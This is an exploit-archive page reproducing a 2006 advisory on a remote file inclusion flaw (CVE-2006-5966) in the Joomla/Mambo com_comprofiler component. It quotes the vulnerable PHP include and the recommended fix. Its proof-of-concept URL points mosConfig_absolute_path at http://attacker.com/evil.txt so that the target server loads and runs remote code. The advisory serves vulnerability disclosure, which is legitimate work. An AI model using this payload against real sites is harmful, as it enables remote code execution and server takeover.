Advertisement






Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities

CVE Category Price Severity
CVE-2006-5966 CWE-98 Not disclosed High
Author Risk Exploitation Type Date
nukedx High Remote 2006-09-12
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006090019

Below is a copy:

------------------------------------------------------------------------
---

Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities

------------------------------------------------------------------------
---

Author          : Matdhule

Date            : August, 25th 2006

Location        : Indonesia, Jakarta

Critical Lvl    : Highly critical

Impact          : System access

Where           : From Remote

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

com_comprofiler Components

Application     : com_comprofiler

version         : 1.0 RC 2

------------------------------------------------------------------------
---

Vulnerability:

~~~~~~~~~~~~~~~

in folder com_comprofiler we found vulnerability script plugin.class.php

-----------------------plugin.class.php----------------------

<?php

/**

* Plugin handler

* @package Joomla

* @author various, JoomlaJoe and Beat

*/

require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized.

Proof Of Concept:

~~~~~~~~~~~~~~~~

http://[target]/[path]/administrator/components/com_comprofiler/plugin.c
lass.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

Solution:

~~~~~~~~

sanitize variabel $mosConfig_absolute_path in plugin.class.php

------------------------------------------------------------------------
---

Shoutz:

~~~~~~

~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker (at) yahoogroups (dot) com [email concealed], jasakom_perjuangan (at) yahoogroups (dot) com [email concealed]

~ #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net

------------------------------------------------------------------------
---

Contact:

~~~~~~~

matdhule[at]gmail[dot]com

-------------------------------- [ EOF ] ----------------------------------

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.